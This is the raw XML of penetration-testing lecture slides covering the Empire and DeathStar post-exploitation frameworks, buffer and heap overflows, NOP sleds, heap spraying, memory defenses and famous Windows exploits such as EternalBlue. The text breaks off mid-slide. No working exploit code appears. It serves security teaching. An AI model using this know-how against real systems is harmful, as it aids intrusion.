          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.powershellempire.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/EmpireProject/Empire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A post-exploitation framework written in PowerShell and Python </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flexible architecture and modules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quickly run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ley loggers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypted communications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run PowerShell even w/o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12338055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DeathStar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r/DeathStar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automate Empire to get Domain Admin </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7771776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 y="100013"/>
            <a:ext cx="9131300" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181987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based overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Special region of memory that stores temporary variables for functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>FILO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Managed for you by the computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1518578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tack_Overflow_2.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-79925" r="-79925"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386352" y="274638"/>
            <a:ext cx="10639882" cy="5851525"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2016-10-04 at 12.27.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2655888"/>
            <a:ext cx="4610100" cy="850900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135250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tack_Overflow_3.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-79925" r="-79925"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1597944" y="143108"/>
            <a:ext cx="10879046" cy="5983056"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2016-10-04 at 12.27.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75" y="2736850"/>
            <a:ext cx="4495800" cy="850900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137829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tack_Overflow_4.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-57517" r="-57517"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334861" y="274638"/>
            <a:ext cx="10639882" cy="5851525"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2016-10-04 at 12.28.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5" y="2703513"/>
            <a:ext cx="4635500" cy="850900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2345005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NOP sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Helps line up an exploit to give it a better chance of success since memory can be very dynamic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Literally an instruction that tells the CPU to do “nothing” on that clock cycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1502982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based overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Region of memory not managed for you, you allocated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>() or the like and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>deallocated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> with free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Try to overwrite data in other buffers so you can then execute code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Often use “heap spraying” to increase chance of success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332897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Offense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Testing Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192889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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="heap-spr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99" y="1717407"/>
            <a:ext cx="8734425" cy="4629150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302336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114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="heap-spra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145" y="787400"/>
            <a:ext cx="5067300" cy="5613400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130387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defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Canaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – data between buffer and return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stack Protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– check if the stack has been modified, if so kill the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, MS DEP (Data Execution Prevention) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Executable space protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Prevents code execution on the stack or heap. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU NX bit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PaX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Exec Shield, MS DEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Address space layout randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Randomizes where everything is stored in memory.  Good luck guessing where it will be!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3396444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Main Categories of Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Local privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>These are often used in combination</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="988715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B714-F5E5-0B48-AFD5-24888427A17F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use in a Penetration Test?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18096089-DE44-A548-A17F-E95700AC38AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4136154785"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2286000"/>
          <a:ext cx="7620000" cy="2468880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5297424">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="160774903"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2322576">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3038843296"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" dirty="0"/>
                        <a:t>Server-side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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>✅</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2736730539"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" dirty="0"/>
                        <a:t>Client-side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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>✅</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="81404759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" dirty="0"/>
                        <a:t>Privilege Escalation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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>✅</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1122430175"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3546588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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Target 1.2.3.4 is listening on port X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Service running on port X has an identified vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Network filtering (ACLs, firewalls, IPS, etc.) will allow attacker access to 1.2.3.4 on port X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker creates specific packets needed to exploit service on 1.2.3.4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85725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Notable Windows Server-side Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>SQL Server: MS02-039 (SQL Slammer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RPC-DCOM: MS03-026 (MS Blaster)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>LSASS:  MS04-011 (Sasser)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>uPNP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: MS05-039 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Zotob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Server Service: MS08-067 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>SMB: MS17-010 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP: CVE-2019-0708 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="860216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A94A-DD01-3C4B-89A3-FA758EB0937A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS17-010 / </a:t>
            </a:r>
            <a:r>
